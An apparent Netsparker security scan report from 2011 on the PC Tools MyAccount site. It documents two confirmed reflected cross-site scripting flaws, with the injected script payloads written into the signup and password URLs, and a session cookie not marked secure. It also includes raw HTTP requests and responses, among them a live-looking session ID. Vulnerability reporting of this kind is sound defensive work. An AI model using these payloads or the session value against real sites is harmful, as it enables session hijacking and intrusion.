XSS, Cross Site Scripting, CWE-79, CAPEC-86, Javascript Injection

Netsparker - Scan Report Summary

TARGET URL	https://secure.pctools.com/myaccount/
SCAN DATE	3/20/2011 8:11:58 PM
REPORT DATE	3/20/2011 8:21:42 PM
SCAN DURATION	00:08:55

Total Requests

Average Speed

req/sec.

identified

confirmed

critical

informational

GHDB, DORK Tests

PROFILE	Previous Settings
ENABLED ENGINES	Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

Authentication

Scheduled

VULNERABILITIES Vulnerabilities
	IMPORTANT 43 % LOW 43 % INFORMATION 14 %

Cross-site Scripting

2 TOTAL

IMPORTANT

CONFIRMED

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /myaccount/signup/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E

/myaccount/signup/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000745)%3C/script%3E CONFIRMED

https://secure.pctools.com/myaccount/signup/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	'"--></style></script><script>alert(0x000745)</script>

Request

GET /myaccount/signup/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000745)%3C/script%3E HTTP/1.1
Referer: https://secure.pctools.com/myaccount/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.pctools.com
Cookie: PHPSESSID=de9ec96a2cf9e0fc329d52c9d14784b5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 6601
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www7.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:36 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>PC Tools - My Account Signup
</title> <meta http-equiv="content-type" content="text/html;charset=UTF-8"> <meta name="description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."> <meta name="keywords" content="PC Software, PC software download, PC utilities"> <meta name="google-site-verification" content="9tcREuFGzBlAoggj4zkFO8K2P1g23EWWZznTZE_vvVk"> <meta name="y_key" content="bbf4ccb064a49855"> <meta name="msvalidate.01" content="F34816E282A125EA2B36F92F1F4DEBE5">  <meta property="og:title" content="PC Tools - My Account Signup
"/> <meta property="og:type" content="website"/> <meta property="og:url" content="http://secure.pctools.com/myaccount/"/> <meta property="og:site_name" content="PCTOOLS"/> <meta property="fb:admins" content="100000215074489"/> <meta property="og:description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."/> <link href="/res/new/css/style-min.css" rel="stylesheet" type="text/css" media="screen, projection"> <link href="/res/css/print.css" rel="stylesheet" type="text/css" media="print"> <script src='/res/new/js/pctools-min.js' type='text/javascript'></script> <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var uri = new Object();
getURL(uri);
var up = uri.path;
up = up.replace(/[/]*$/g,'');
if(up.search(/^\//) < 0) { up='/'+up;}
if(up.search(/\/$/) < 0) { up=up+"/";}

var pageTracker = _gat._getTracker("UA-1490218-1");
if(getRef() != "") { pageTracker._setCampNameKey("ref");}
if(getParam('utm_campaign') != "") { pageTracker._setCampNameKey("utm_campaign");}
pageTracker._setDomainName(".pctools.com");
pageTracker._initData();
pageTracker._trackPageview(up);
</script><script src='/res/js/mbox.js' type='text/javascript'></script> <script type="text/javascript" src="/res/js/jquery-1.4.2.min.js"></script> <link rel="canonical" href="http://www.pctools.com/guides/password/"> <link rel="stylesheet" href="/res/new/css/coda-slider-2.0-min.css" type="text/css" media="screen"> <link rel="stylesheet" href="/res/new/css/smoothness/jquery-ui-1.8.custom-min.css" type="text/css" media="screen"> <link type="text/css" href="/res/new/css/smoothness/jquery-ui-1.8.accordion-min.css" rel="stylesheet" media="screen"> <link href="/res/new/css/myaccount.css" rel="stylesheet" type="text/css" media="screen, projection"> <style type="text/css"> img, input, form, li, li#login a, ul { behavior: url(/res/new/images/iepngfix.htc) } </style> <link href="/res/new/css/en.css" rel="stylesheet" type="text/css" media="screen, projection"></head><body><div id="header"> <a href="http://www.pctools.com/"><img class="logo" src="/res/new/images/logo.png" alt="PC Antivirus Antispyware Software and Windows Utilities - PC Tools"></a></div><ul id="topnav"><li class="nav" id="home"><a href="http://www.pctools.com/">Home</a></li><li class="nav" id="dropdown"><a href="http://www.pctools.com/pc-software/">Software <img src="/res/new/images/dropdown-arrowdown.png"></a><div class="clear"></div><div class="sub"><ul><li><h3>Security Software</h3></li><li><a href="http://www.pctools.com/internet-security/">PC Tools<sup></sup> Internet Security</a></li><li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup></sup> with AntiVirus</a></li><li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup></sup> </a></li><li><a href="http://www.pctools.com/free-antivirus/">PC Tools<sup></sup> AntiVirus Free </a></li><li><a href="http://www.threatfire.com/">ThreatFire</a></li><li><a href="http://www.iantivirus.com/">iAntiVirus for Mac OS X</a></li><li><a href="http://www.pctools.com/firewall/">PC Tools<sup></sup> Firewall Plus</a></li></ul><ul><li><h3>Utility Software</h3></li><li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup></sup> Performance Toolkit</a></li><li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup></sup></a></li><li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup></sup> Simple Backup</a></li><li><a href="http://www.pctools.com/file-recover/">PC Tools<sup></sup> File Recover</a></li><li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup></sup> Privacy Guardian</a></li><li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li><li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul></div></li><li class="nav" id=""><a href="http://www.pctools.com/support/">Support</a></li><li class="nav" id=""><a href="http://www.pctools.com/company/">Company</a></li><li id="corner-right" class="nav"><img src="/res/new/images/navbg-right.gif"/></li><li id="login" class="nav"> <span id="myaccount_login" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount Login</a></span> <span id="myaccount_logout" style="display: none;"><a href="/myaccount/logout/" rel="NOFOLLOW" style="color:#FFF">Logout</a></span> <span id="myaccount" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount</a></span></li></ul><div id="ps"></div><script type="text/javascript"> var authenticated = 0; var pr_auth = 0; var language = 'en';</script>   <div id="main-top"> <h1>MyAccount Registration</h1><div><p>Welcome to PC Tools <strong>MyAccount</strong> Registration page.</p>
<p>Sign up with PC Tools My Account to easily access your product
details and license codes, manage your subscription payment options,
browse PC Tools’ complementary products that enhance your PC experience,
and monitor your support requests from one central location.</p>
<p>Please enter the email address you used when placing your PC Tools
software order below to confirm your status on PC Tools <strong>MyAccount</strong> page.</p></div><form method="POST"><table id="tab_table" cellpadding="0" cellspacing="0"><tr><td class="x"><table class="heading_tbl" cellpadding="0" cellspacing="0"><tr><td class="corner_b_l"> </td><td class="text_b_c">1. Enter your email</td><td class="corner_b_r"> </td></tr></table></td><td class="x"><table class="heading_tbl" cellpadding="0" cellspacing="0"><tr><td class="corner_g_l"> </td><td class="text_g_c">2. Enter your login details</td><td class="corner_g_r"> </td></tr></table></td><td class="x"><table class="heading_tbl" cellpadding="0" cellspacing="0"><tr><td class="corner_g_l"> </td><td class="text_g_c">3. Finish Registration</td><td class="corner_g_r"> </td></tr></table></td></tr></table><div id="greyborder"><table width="100%" cellspacing="5"> <tr> <td><br> <input type="hidden" name="step" value="2e957eb8c030fc2d10de5607715f4c55"> <b style="color: #5E5F5F;">E-mail:</b> <input type="text" name="email" class="textfield" size="40"> </td> </tr> <tr> <td><div class="smallnote"><p>Please enter a valid email address. When the registration process finishes, we will send you a verification code to this email.</p></div></td> </tr> <tr> <td align="right"> <div style="margin-top: 20px;"><input type="submit" value="Continue" class="button_blue"></div> </td> </tr></table></div></form><div><p>Already have an account? Please <a href="/myaccount/">login here</a>.</p></div> <div class="clear"> </div></div><div id="footer"> <div class="footer-content"><ul> <li class="footer-header">Security Software</li> <li><a href="http://free.pctools.com/free-antivirus/">Free AntiVirus Software</a></li> <li><a href="http://www.pctools.com/internet-security/">PC Tools<sup>™</sup> Internet Security</a></li> <li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup>™</sup> with AntiVirus</a></li> <li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup>™</sup> </a></li> <li><a href="http://www.threatfire.com">ThreatFire</a></li> <li><a href="http://www.browserdefender.com/">Browser Defender</a></li></ul><ul> <li class="footer-header">Utility Software</li> <li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup>™</sup> Performance Toolkit</a></li> <li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup>™</sup></a></li> <li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup>™</sup> Simple Backup</a></li> <li><a href="http://www.pctools.com/file-recover/">PC Tools<sup>™</sup> File Recover</a></li> <li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup>™</sup> Privacy Guardian</a></li> <li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li> <li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul><ul class="narrow"> <li class="footer-header">Links</li> <li><a href="http://www.pctools.com/security-news/glossary/">Adware Glossary</a></li> <li><a href="http://www.pctools.com/mrc/dispute/">Spyware Disputes</a></li> <li><a href="http://www.pctools.com/security-news/">Security News</a></li> <li><a href="http://www.pctools.com/sitemap/">Sitemap</a></li> <li><a href="http://www.pctools.com/mrc/infections/">Infection Database</a></li></ul><ul class="narrow"> <li class="footer-header">Company</li> <li><a href="http://www.pctools.com/company/">About Us</a></li> <li><a href="http://www.pctools.com/company/awards/">Awards</a></li> <li><a href="http://www.pctools.com/labs/">Labs</a></li> <li><a href="http://www.pctools.com/partners/">Partners</a></li></ul><div class="social"> <span class="footer-header">Get Updates</span><br> <span class="ok" id="subscriberesult_btm"></span> <form action="/newsletter/subscribe/" name="softmail" method="post"> <input type="hidden" value="" name="detail_id" /> <input type="hidden" value="default" name="product" /> <input type="text" title="Enter your e-mail address" id="email_btm" name="email" class="blur" /> <input type="submit" onclick="newsletterSubscribe_btm(); return false;" value="Submit" /> <input type="hidden" value="1" name="submitted"> </form> <ul class="social-links"> <li id="facebook"><img src="/res/new/images/facebook.png">  <a href="http://www.facebook.com/PCTOOLS">Find us on Facebook</a></li> <li id ="like"><iframe src="http://www.facebook.com/plugins/like.php?href=secure.pctools.com/myaccount/&layout=button_count&width=90&action=like&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:20px;" allowTransparency="true"></iframe></li> <li id="twitter" ><img src="/res/new/images/twitter.png">  <a href="http://twitter.com/pctools">Find us on Twitter</a></li> </ul> </div> <div style="clear:both"></div> <script type="text/javascript"> function Ajax() { // This is how we make Private variables. var http_request = false var callback_fctn = false // This is how we make a Private method - it is the only way to access the Private variables above. function contents() { if( http_request.readyState == 4 ) { if( http_request.status == 200 ) { callback_fctn(http_request) } http_request = false callback_fctn = false } } // And this is a Privileged method - it cannot be replaced, but it has Public accessability and can work with Private variables and methods. // (Many people would call this a Public method, which is almost correct insofar as it is available publically.) this.request = function(url, return_fctn, post_data) { if( http_request ) // Oops: request in process! return false if( window.XMLHttpRequest ) { // Mozilla, Safari,... http_request = new XMLHttpRequest() // This might be reqiured for Mozilla at some point // if( http_request.overrideMimeType ) http_request.overrideMimeType('text/xml'); } else if( window.ActiveXObject ) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP") } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { } } } if( !http_request ) { // alert('Giving up -- Cannot create an XMLHTTP instance'); return false; } // Anonymous functions like this lead to memory leaks in IE6, unfortunately. // this.http_request.onreadystatechange = function() { Ajax.contents(http_request, return_fctn); }; callback_fctn = return_fctn http_request.onreadystatechange = contents; if( post_data ) { http_request.open('POST', url, true); http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); http_request.setRequestHeader('Cookie', document.cookie); http_request.send(post_data); } else { http_request.open('GET', url, true) http_request.setRequestHeader('Cookie', document.cookie); http_request.send(null); } return true; };}</script><script type="text/javascript">var supportAjax_btm = new Ajax();var theElement_btm = "subscriberesult_btm";function updateView_btm(request) { if (document.getElementById(theElement_btm) && request.responseText != "") { document.getElementById(theElement_btm).style.display = ''; document.getElementById(theElement_btm).innerHTML = request.responseText; }}function newsletterSubscribe_btm() { supportAjax_btm.request('/res/ajax/newsletter.php?email=' + encodeURIComponent(document.getElementById('email_btm').value) + '&pro..

- /myaccount/password/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000746)%3C/script%3E

/myaccount/password/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000746)%3C/script%3E CONFIRMED

https://secure.pctools.com/myaccount/password/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x..

Parameters

Parameter	Type	Value
URI-BASED	Raw URI	'"--></style></script><script>alert(0x000746)</script>

Request

GET /myaccount/password/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000746)%3C/script%3E HTTP/1.1
Referer: https://secure.pctools.com/myaccount/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.pctools.com
Cookie: PHPSESSID=de9ec96a2cf9e0fc329d52c9d14784b5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR ADMo TAIo OUR STP COM STA"
pics-label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.pctools.com" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 6079
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:11:36 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <title>PC Tools - My Account
</title> <meta http-equiv="content-type" content="text/html;charset=UTF-8"> <meta name="description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."> <meta name="keywords" content="PC Software, PC software download, PC utilities"> <meta name="google-site-verification" content="9tcREuFGzBlAoggj4zkFO8K2P1g23EWWZznTZE_vvVk"> <meta name="y_key" content="bbf4ccb064a49855"> <meta name="msvalidate.01" content="F34816E282A125EA2B36F92F1F4DEBE5">  <meta property="og:title" content="PC Tools - My Account
"/> <meta property="og:type" content="website"/> <meta property="og:url" content="http://secure.pctools.com/myaccount/"/> <meta property="og:site_name" content="PCTOOLS"/> <meta property="fb:admins" content="100000215074489"/> <meta property="og:description" content="PC Tools publishes highly trusted, award-winning PC software, including Spyware Doctor, Registry Mechanic, Free AntiVirus, Firewall Plus and Spam Monitor, which protect the privacy and security of Windows® PC users."/> <link href="/res/new/css/style-min.css" rel="stylesheet" type="text/css" media="screen, projection"> <link href="/res/css/print.css" rel="stylesheet" type="text/css" media="print"> <script src='/res/new/js/pctools-min.js' type='text/javascript'></script> <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var uri = new Object();
getURL(uri);
var up = uri.path;
up = up.replace(/[/]*$/g,'');
if(up.search(/^\//) < 0) { up='/'+up;}
if(up.search(/\/$/) < 0) { up=up+"/";}

var pageTracker = _gat._getTracker("UA-1490218-1");
if(getRef() != "") { pageTracker._setCampNameKey("ref");}
if(getParam('utm_campaign') != "") { pageTracker._setCampNameKey("utm_campaign");}
pageTracker._setDomainName(".pctools.com");
pageTracker._initData();
pageTracker._trackPageview(up);
</script><script src='/res/js/mbox.js' type='text/javascript'></script> <script type="text/javascript" src="/res/js/jquery-1.4.2.min.js"></script> <link rel="canonical" href="http://www.pctools.com/guides/password/"> <link rel="stylesheet" href="/res/new/css/coda-slider-2.0-min.css" type="text/css" media="screen"> <link rel="stylesheet" href="/res/new/css/smoothness/jquery-ui-1.8.custom-min.css" type="text/css" media="screen"> <link type="text/css" href="/res/new/css/smoothness/jquery-ui-1.8.accordion-min.css" rel="stylesheet" media="screen"> <link href="/res/new/css/myaccount.css" rel="stylesheet" type="text/css" media="screen, projection"> <style type="text/css"> img, input, form, li, li#login a, ul { behavior: url(/res/new/images/iepngfix.htc) } </style> <link href="/res/new/css/en.css" rel="stylesheet" type="text/css" media="screen, projection"></head><body><div id="header"> <a href="http://www.pctools.com/"><img class="logo" src="/res/new/images/logo.png" alt="PC Antivirus Antispyware Software and Windows Utilities - PC Tools"></a></div><ul id="topnav"><li class="nav" id="home"><a href="http://www.pctools.com/">Home</a></li><li class="nav" id="dropdown"><a href="http://www.pctools.com/pc-software/">Software <img src="/res/new/images/dropdown-arrowdown.png"></a><div class="clear"></div><div class="sub"><ul><li><h3>Security Software</h3></li><li><a href="http://www.pctools.com/internet-security/">PC Tools<sup></sup> Internet Security</a></li><li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup></sup> with AntiVirus</a></li><li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup></sup> </a></li><li><a href="http://www.pctools.com/free-antivirus/">PC Tools<sup></sup> AntiVirus Free </a></li><li><a href="http://www.threatfire.com/">ThreatFire</a></li><li><a href="http://www.iantivirus.com/">iAntiVirus for Mac OS X</a></li><li><a href="http://www.pctools.com/firewall/">PC Tools<sup></sup> Firewall Plus</a></li></ul><ul><li><h3>Utility Software</h3></li><li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup></sup> Performance Toolkit</a></li><li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup></sup></a></li><li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup></sup> Simple Backup</a></li><li><a href="http://www.pctools.com/file-recover/">PC Tools<sup></sup> File Recover</a></li><li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup></sup> Privacy Guardian</a></li><li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li><li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul></div></li><li class="nav" id=""><a href="http://www.pctools.com/support/">Support</a></li><li class="nav" id=""><a href="http://www.pctools.com/company/">Company</a></li><li id="corner-right" class="nav"><img src="/res/new/images/navbg-right.gif"/></li><li id="login" class="nav"> <span id="myaccount_login" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount Login</a></span> <span id="myaccount_logout" style="display: none;"><a href="/myaccount/logout/" rel="NOFOLLOW" style="color:#FFF">Logout</a></span> <span id="myaccount" style="display: none;"><a href="/myaccount/" rel="NOFOLLOW" style="color:#FFF">MyAccount</a></span></li></ul><div id="ps"></div><script type="text/javascript"> var authenticated = 0; var pr_auth = 0; var language = 'en';</script>   <div id="main-top"> <h1>Forgot Password</h1><div>Please enter your email address below and we will send you a new password.</div><br><form method="POST"><b>E-mail Address:</b><br><input type="text" name="email" class="textfield" size="40" value=""><input type="submit" value="Submit" class="button_blue"></form> <div class="clear"> </div></div><div id="footer"> <div class="footer-content"><ul> <li class="footer-header">Security Software</li> <li><a href="http://free.pctools.com/free-antivirus/">Free AntiVirus Software</a></li> <li><a href="http://www.pctools.com/internet-security/">PC Tools<sup>™</sup> Internet Security</a></li> <li><a href="http://www.pctools.com/spyware-doctor-antivirus/">PC Tools Spyware Doctor<sup>™</sup> with AntiVirus</a></li> <li><a href="http://www.pctools.com/spyware-doctor/">PC Tools Spyware Doctor<sup>™</sup> </a></li> <li><a href="http://www.threatfire.com">ThreatFire</a></li> <li><a href="http://www.browserdefender.com/">Browser Defender</a></li></ul><ul> <li class="footer-header">Utility Software</li> <li><a href="http://www.pctools.com/performance-toolkit/">PC Tools<sup>™</sup> Performance Toolkit</a></li> <li><a href="http://www.pctools.com/registry-mechanic/">PC Tools Registry Mechanic<sup>™</sup></a></li> <li><a href="http://www.pctools.com/simple-backup/">PC Tools<sup>™</sup> Simple Backup</a></li> <li><a href="http://www.pctools.com/file-recover/">PC Tools<sup>™</sup> File Recover</a></li> <li><a href="http://www.pctools.com/privacy-guardian/">PC Tools<sup>™</sup> Privacy Guardian</a></li> <li><a href="http://www.pctools.com/password-manager/">RoboForm Pro</a></li> <li><a href="http://www.pctools.com/synchronize/">GoodSync Pro</a></li></ul><ul class="narrow"> <li class="footer-header">Links</li> <li><a href="http://www.pctools.com/security-news/glossary/">Adware Glossary</a></li> <li><a href="http://www.pctools.com/mrc/dispute/">Spyware Disputes</a></li> <li><a href="http://www.pctools.com/security-news/">Security News</a></li> <li><a href="http://www.pctools.com/sitemap/">Sitemap</a></li> <li><a href="http://www.pctools.com/mrc/infections/">Infection Database</a></li></ul><ul class="narrow"> <li class="footer-header">Company</li> <li><a href="http://www.pctools.com/company/">About Us</a></li> <li><a href="http://www.pctools.com/company/awards/">Awards</a></li> <li><a href="http://www.pctools.com/labs/">Labs</a></li> <li><a href="http://www.pctools.com/partners/">Partners</a></li></ul><div class="social"> <span class="footer-header">Get Updates</span><br> <span class="ok" id="subscriberesult_btm"></span> <form action="/newsletter/subscribe/" name="softmail" method="post"> <input type="hidden" value="" name="detail_id" /> <input type="hidden" value="default" name="product" /> <input type="text" title="Enter your e-mail address" id="email_btm" name="email" class="blur" /> <input type="submit" onclick="newsletterSubscribe_btm(); return false;" value="Submit" /> <input type="hidden" value="1" name="submitted"> </form> <ul class="social-links"> <li id="facebook"><img src="/res/new/images/facebook.png">  <a href="http://www.facebook.com/PCTOOLS">Find us on Facebook</a></li> <li id ="like"><iframe src="http://www.facebook.com/plugins/like.php?href=secure.pctools.com/myaccount/&layout=button_count&width=90&action=like&colorscheme=light&height=20" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:90px; height:20px;" allowTransparency="true"></iframe></li> <li id="twitter" ><img src="/res/new/images/twitter.png">  <a href="http://twitter.com/pctools">Find us on Twitter</a></li> </ul> </div> <div style="clear:both"></div> <script type="text/javascript"> function Ajax() { // This is how we make Private variables. var http_request = false var callback_fctn = false // This is how we make a Private method - it is the only way to access the Private variables above. function contents() { if( http_request.readyState == 4 ) { if( http_request.status == 200 ) { callback_fctn(http_request) } http_request = false callback_fctn = false } } // And this is a Privileged method - it cannot be replaced, but it has Public accessability and can work with Private variables and methods. // (Many people would call this a Public method, which is almost correct insofar as it is available publically.) this.request = function(url, return_fctn, post_data) { if( http_request ) // Oops: request in process! return false if( window.XMLHttpRequest ) { // Mozilla, Safari,... http_request = new XMLHttpRequest() // This might be reqiured for Mozilla at some point // if( http_request.overrideMimeType ) http_request.overrideMimeType('text/xml'); } else if( window.ActiveXObject ) { // IE try { http_request = new ActiveXObject("Msxml2.XMLHTTP") } catch (e) { try { http_request = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) { } } } if( !http_request ) { // alert('Giving up -- Cannot create an XMLHTTP instance'); return false; } // Anonymous functions like this lead to memory leaks in IE6, unfortunately. // this.http_request.onreadystatechange = function() { Ajax.contents(http_request, return_fctn); }; callback_fctn = return_fctn http_request.onreadystatechange = contents; if( post_data ) { http_request.open('POST', url, true); http_request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); http_request.setRequestHeader('Cookie', document.cookie); http_request.send(post_data); } else { http_request.open('GET', url, true) http_request.setRequestHeader('Cookie', document.cookie); http_request.send(null); } return true; };}</script><script type="text/javascript">var supportAjax_btm = new Ajax();var theElement_btm = "subscriberesult_btm";function updateView_btm(request) { if (document.getElementById(theElement_btm) && request.responseText != "") { document.getElementById(theElement_btm).style.display = ''; document.getElementById(theElement_btm).innerHTML = request.responseText; }}function newsletterSubscribe_btm() { supportAjax_btm.request('/res/ajax/newsletter.php?email=' + encodeURIComponent(document.getElementById('email_btm').value) + '&product=myaccount&language=en',updateView_btm);}</script> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="250" class="noprint"> </td> <td class="copy" align="center">Copyright © 1998-2011 PC Tools. All rights reserved.</td> <td class="copy noprint" width="250" align="right"><a href="http://www.symantec.com/">Symantec</a> | <a href="http://us.norton.com/">Norton</a> | <a href="http://www.verisign.com/">Verisign</a> | <a href="http://www.pctools.com/info/privacypolicy/" rel="NOFOLLOW">Privacy Policy</a> | <a href="http://www.pctools.com/info/legalnotices/" rel="NOFOLLOW">Legal Notices & Terms</a> </td> </tr></table></div><script type='text/javascript'> jQuery(document).ready(function(){ jQuery('#language_list_div').css({position: 'absolute', left: (jQuery('#topnav').offset().left + jQuery('#topnav').outerWidth() - jQuery('#lang').outerWidth()) + 'px',top: (jQuery('#topnav').offset().top /3)+'px'}) jQuery(window).resize(function(){ jQuery('#language_list_div').css({position: 'absolute', left: (jQuery('#topnav').offset().left + +jQuery('#topnav').outerWidth() - jQuery('#lang').outerWidth()) + 'px',top: (jQuery('#topnav').offset().top /3)+'px'}) }); });</script><div id="language_list_div"><script type="text/javascript">function select_language() { change_to = document.getElementById('lang').value; if(change_to != "") { document.location.href=change_to; }}</script> <form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/myaccount/password/'"--></style></script><script>netsparker(0x000746)</script>"> <select style="visibility:hidden;" name="language" size="1" onchange="select_language();" id="lang"><option selected>English</option><option value="/de/myaccount/password/'"--></style></script><script>netsparker(0x000746)</script>/">Deutsch</option><option value="/es/myaccount/password/'"--></style></script><script&g..

Cookie Not Marked As Secure

1 TOTAL

IMPORTANT

CONFIRMED

A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

See the remedy for solution.
Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.

- /myaccount/

/myaccount/ CONFIRMED

https://secure.pctools.com/myaccount/

Identified Cookie

PHPSESSID

Request

GET /myaccount/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: secure.pctools.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/4.4.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
